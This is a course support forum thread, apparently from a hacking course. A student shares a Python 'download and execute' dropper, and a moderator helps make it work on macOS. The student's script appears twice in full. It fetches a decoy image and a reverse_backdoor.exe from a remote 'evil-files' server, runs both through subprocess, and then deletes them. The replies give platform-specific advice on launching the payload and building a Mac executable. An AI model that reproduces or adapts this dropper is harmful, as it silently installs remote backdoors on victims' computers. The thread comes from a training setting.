- This topic has 6 replies, 2 voices, and was last updated 4 years, 4 months ago by Diego Pérez.
- AuthorPosts
- August 8, 2020 at 7:38 pm #43851Peter QueenParticipant
Hello Diego,
I am having an issue with the download and execute on my Mac (not on the same network). When I run the same code on a Windows machine (not virtual) the code works fine and I am able to download a file (jpg or pdf) and the reverse backdoor.
With Mac i get this error (I am executing the code from terminal as I wanted to see the error, with the exe it simply doesn’t work):
as-MacBook-Air:Downloads macbookair$ python down_exec.py /bin/sh: Image.jpeg: command not found
Code:
#!/usr/bin/env python import requests, subprocess, os, tempfile def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name, "wb") as out_file: out_file.write(get_response.content) temp_directory = tempfile.gettempdir() os.chdir(temp_directory) download("http://192.168.1.104/evil-files/Image.jpeg") subprocess.Popen("Image.jpeg", shell=True) download("http://192.168.1.104/evil-files/reverse_backdoor.exe") subprocess.call("reverse_backdoor.exe", shell=True) os.remove("Image.jpeg") os.remove("reverse_backdoor.exe")
I then tried to just download the jpeg and exe and it worked:
Code:
#!/usr/bin/env python import requests, subprocess, os, tempfile def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name, "wb") as out_file: out_file.write(get_response.content) #temp_directory = tempfile.gettempdir() #os.chdir(temp_directory) download("http://192.168.1.104/evil-files/photo.jpeg") #subprocess.Popen("Image.jpeg", shell=True) download("http://192.168.1.104/evil-files/reverse_backdoor.exe") #subprocess.call("reverse_backdoor.exe", shell=True) #os.remove("Image.jpeg") #os.remove("reverse_backdoor.exe")
I believe the problem is with the subprocess command.
Can you help?
thanks
August 9, 2020 at 3:35 am #43866Diego PérezModeratorHi!
Yeah, in macOS you’ll need to use the command open, if you just give it the name of the file nothing will happen, as you can see in the error message it saids command not found, so it thinks that image.jpg is a command and not a file.
So inside the subprocees call just add the command open befor the name of the file. You can test it directly in macOS terminal to check that it works.Hope it helps!
DiegoAugust 9, 2020 at 8:18 am #43875Peter QueenParticipantThanks Diego,
I am now able to download the JPEG but I have a problem with the backdoor. I added open inside subprocess.call but it does’t execute the exe. Instead it opens the Unarchiver app on screen and no connection gets established . Is open the right command to run the reverse backdoor?
Thanks for your help
August 10, 2020 at 3:36 am #43928Diego PérezModeratorHi Peter!
The problem here is that .exe is a windows only executable. If you want an executable for macOS you’ll need to compile the python script in a mac computer, use the same method as in linux. Executables can be run exactly as in linux.Hope it helps!
DiegoAugust 11, 2020 at 11:05 am #43997Peter QueenParticipantHi Diego,
I am not sure I understand correctly. I compiled the python script on a osx machine using pyinstaller as shown in the lesson and i get an exe. As exe are Windows executable only how do I compile the script into an osx executable? From the social engineering course I learned how to turn bat file into a script but how do I do it with a Python script? As you can see I am very confused.
Thanks for clarifying
August 11, 2020 at 1:08 pm #44000Peter QueenParticipantHi Diego,
To clarify my last post, I know how to turn a applescript payload into an application but my problem is to turn a python script into an application for osx.
August 12, 2020 at 3:47 am #44033Diego PérezModeratorHi!
Which were the commands used in OSX? I have tried it and I got an app not a .exe fileLet me know.
Diego - AuthorPosts
- You must be logged in to reply to this topic.